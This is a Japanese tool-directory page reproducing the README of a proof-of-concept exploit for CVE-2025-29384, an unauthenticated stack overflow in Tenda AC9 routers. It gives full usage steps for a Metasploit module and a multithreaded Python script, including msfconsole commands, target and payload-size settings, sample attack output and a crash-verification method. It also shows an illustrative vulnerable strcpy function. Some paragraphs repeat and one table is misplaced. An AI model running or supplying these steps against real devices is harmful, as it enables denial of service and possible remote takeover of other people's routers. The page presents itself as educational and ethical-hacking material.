Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-29384-poc | Kitploit
ツール/GitHubGitHub/otsmane-ahmed/cve-2025-29384-poc
組み込みシステムセキュリティエクスプロイトフレームワーク脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストハードウェアとIoTセキュリティ学習と教育ペイロード開発バイナリエクスプロイト
GitHubotsmane-ahmed/cve-2025-29384-poc

cve-2025-29384-poc

1411年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

CVE-2025-29384 概念実証エクスプロイト

概要

このリポジトリには、ファームウェアバージョン V15.03.05.14_multi を実行している Tenda AC9 ルーターで発見された、重大なスタックベースのバッファオーバーフロー脆弱性である CVE-2025-29384 に対する高度な概念実証(PoC)エクスプロイトが含まれています。この脆弱性により、認証されていないリモート攻撃者がルーターの Web サーバーをクラッシュさせ(サービス拒否、DoS)、任意のコードを実行できる可能性があります(リモートコード実行、RCE)。

このプロジェクトの目的は、エクスプロイト開発スキルの実証、サイバーセキュリティコミュニティへの貢献、および学術評価(例:サイバーセキュリティ�学金)のための教育的ショーケースの提供です。 このリポジトリには、ファームウェアバージョン V15.03.05.14_multi を実行している Tenda AC9 ルーターで発見された、重大なスタックベースのバッファオーバーフロー脆弱性である CVE-2025-29384 に対する高度な概念実証(PoC)エクスプロイトが含まれています。この脆弱性により、認証されていないリモート攻撃者がルーターの Web サーバーをクラッシュさせ(サービス拒否、DoS)、任意のコードを実行できる可能性があります(リモートコード実行、RCE)。

このプロジェクトの目的は、エクスプロイト開発スキルの実証、サイバーセキュリティコミュニティへの貢献、およびサイバーセキュリティ奨学金などの学術評価のための教育的ショーケースの提供です。

脆弱性の詳細

CVE の説明

CVE-2025-29384 は、Tenda AC9 ルーターの Web 管理インターフェース、具体的には次のエンドポイントに影響します:

root@kitploit:~
/goform/AdvSetMacMtuWan

この脆弱性は、HTTP POST リクエストを介して処理される wanMTU パラメータの不適切な境界チェックに起因します。入力は検証なしに固定サイズのスタックバッファにコピーされるため、古典的なスタックベースのバッファオーバーフローが発生します。

影響

  • サービス拒否(DoS):ルーターの HTTP サーバーをクラッシュさせ、再起動まで応答不能にします。
  • 潜在的な RCE:攻撃者はリターンアドレスを上書きし、ルーターのMIPS ベースのアーキテクチャ上で任意のコードを実行できる可能性があります。
  • 認証不要:この脆弱性は資格情報なしでリモートからトリガーできるため、深刻度が高まります。

技術解説

脆弱な関数(仮想的な再構成)は次のような構造です:

root@kitploit:~
void process_mtu(char *input) {
    char buffer[256];  // Fixed-size stack buffer
    strcpy(buffer, input);  // No length check, causes overflow
    // Process MTU value...
}

過大なペイロード(例:1024 バイト以上)を送信する攻撃者は、関数のリターンアドレスを含む隣接メモリを上書きし、コード実行につながる可能性があります。

CVSS v3.1 スコア:9.8(Critical)

影響を受けるデバイス

Tenda AC9 は、以下の仕様を持つデュアルバンド無線ルーターです:

  • CPU:Broadcom BCM4708(MIPS 74Kc、デュアルコア、約 1 GHz)
  • RAM:128 MB
  • Flash:16 MB
  • Wi-Fi:デュアルバンド 802.11ac(AC1200)
  • ポート:1x ギガビット WAN、4x ギガビット LAN
  • ファームウェア:V15.03.05.14_multi(脆弱性確認済み)

開示のタイムライン

  • 2025 年 3 月 14 日 – CVE-2025-29384 が NVD/MITRE に公開。
  • 2025 年 3 月 17 日 – この PoC を開発しテスト。
  • 2025 年 3 月 17 日 – この日付の時点で Tenda からの公式パッチはありません。

PoC エクスプロイトの詳細

Ruby 製 Metasploit モジュール

このリポジトリには、CVE-2025-29384 用の Ruby ベースの Metasploit モジュールも含まれています。このモジュールは Metasploit Framework とシームレスに統合され、msfconsole を使用して脆弱性を悪用できます。

Ruby モジュールの使用方法

ステップ 1:モジュールをダウンロード

root@kitploit:~
git clone https://github.com/Otsmane-Ahmed/cve-2025-29384-poc
cd cve-2025-29384-poc

ステップ 2:モジュールを Metasploit にコピー

Ruby モジュールファイルを見つけ、Metasploit の exploits ディレクトリにコピーします:

root@kitploit:~
cp tenda_ac9_stack_overflow.rb ~/.msf4/modules/exploits/linux/http/

注記: ディレクトリが存在しない場合は作成します:

root@kitploit:~
mkdir -p ~/.msf4/modules/exploits/linux/http/

ステップ 3:Metasploit を起動

Metasploit Framework を起動します:

root@kitploit:~
msfconsole

モジュールを読み込みます:

root@kitploit:~
use exploit/linux/http/tenda_ac9_stack_overflow

ステップ 4:エクスプロイトを設定して実行

ターゲット IP アドレスを設定します:

root@kitploit:~
set RHOSTS <target_ip>

ペイロードサイズを設定します(オプション、デフォルトは 1024):

root@kitploit:~
set PAYLOAD_SIZE 2048

エクスプロイトを実行します:

root@kitploit:~
run

出力例

root@kitploit:~
[*] Targeting Tenda AC9 at 192.168.0.1:80...
[*] Sending payload of size 2048...
[+] Payload sent successfully!
[*] Response: HTTP/1.1 200 OK...

期待される結果

成功:ルーターの Web サーバーがクラッシュし、サービス拒否(DoS)状態が発生します。
失敗:ルーターが引き続き動作している場合、脆弱性がないか、パッチ適用済みのファームウェアバージョンが実行されている可能性があります。

エクスプロイトの概要

この PoC は、/goform/AdvSetMacMtuWan に過大な入力を送信してバッファオーバーフローを引き起こし、Web サーバーをクラッシュさせるとともに RCE の可能性を示す Python ベースのエクスプロイトです。

テスト環境

  • オペレーティングシステム:Kali Linux
  • Python バージョン:3.x
  • テストデバイス:Tenda AC9(ファームウェア V15.03.05.14_multi)

特徴

マルチスレッド – 信頼性を高めるため、複数の同時エクスプロイト試行を起動します。

動的ペイロード – ランダム化された base64 エンコードの攻撃文字列を生成します。

ロギング – 構造化されたデバッグに Python の logging モジュールを使用します。

カスタマイズ可能なパラメータ – ターゲット IP、ペイロードサイズ、スレッド数を調整します。

エクスプロイトの概要

この PoC は、/goform/AdvSetMacMtuWan に過大な入力を送信してバッファオーバーフローを引き起こし、Web サーバーをクラッシュさせる Python ベースのエクスプロイトです。

使用方法

前提条件

  • Python 3.x
  • V15.03.05.14_multi ファームウェアを搭載した Tenda AC9 ルーター

エクスプロイトの実行

root@kitploit:~
python poc.py --target <router_ip> --size 2048 --threads 10
引数:
引数説明
--targetルーターの IP(デフォルト:192.168.0.1)

出力例

root@kitploit:~
[+] CVE-2025-29384 Exploit Engine
[INFO] Target: 192.168.0.1
[INFO] Sending payload (2048 bytes)...
[WARNING] Target timeout - possible crash!
[INFO] Exploit sequence completed.

期待される結果

成功:ルーターの Web インターフェースが応答しなくなります(DoS 状態)。

失敗:ルーターが引き続き応答します(脆弱性がないか、ファームウェアが異なる)。

検証

エクスプロイトがルーターを正常にクラッシュさせたことを確認するには、Web インターフェースの再読み込みを試みます。応答しなくなった場合、攻撃は成功しています。さらなる分析のために、ネットワークログで切断された接続を確認するか、ping を使用してデバイスの応答性を検証してください。

免責事項

このプロジェクトは教育および倫理的なハッキング目的のみです。このエクスプロイトの不正使用は違法です。著者は、このコードによって引き起こされた誤用または損害について責任を負いません。

Otsmane Ahmed によって ❤️ を込めて開発されました このプロジェクトは教育および倫理的なハッキング目的のみです。このエクスプロイトの不正使用は違法です。著者は、このコードによって引き起こされた誤用または損害について責任を負いません。

ライセンス

このプロジェクトは MIT ライセンス の下で公開されています。

ツールをダウンロード
メトリック値
攻撃元Network
攻撃の複雑さLow
必要な権限None
ユーザー操作None
機密性への影響High
整合性への影響High
可用性への影響High
--size
ペイロードサイズ(バイト単位)(デフォルト:1024)
--threads同時スレッド数(デフォルト:5)